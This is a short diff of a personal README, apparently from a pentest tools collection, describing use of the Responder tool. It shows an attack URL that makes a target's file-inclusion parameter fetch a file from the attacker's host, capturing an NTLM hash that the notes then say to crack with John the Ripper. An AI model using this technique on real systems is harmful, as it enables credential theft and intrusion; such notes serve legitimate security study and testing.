AndreMIsidoro/tools/responder/README.md

 	http:\\<target_ip>/?page=//<our_ip>/somefile

-Then we just crack the hash with brute force
+You should see the hash printed on Responder.
+Save the hash to a file and crack it with a tool like johntheripper
 ## Installation

 	git clone https://github.com/lgandx/Responder